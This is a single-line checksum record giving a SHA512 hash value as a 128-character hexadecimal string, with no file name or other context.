SHA512 e1b7d0107733f81937415104e70f68b1be6fd0ca65dccf4ff72637943d44278d3a77f704aedff59d2dbc0d56a609b2590c8ec0dd6bc48ab30f1dad0c07a0a3ee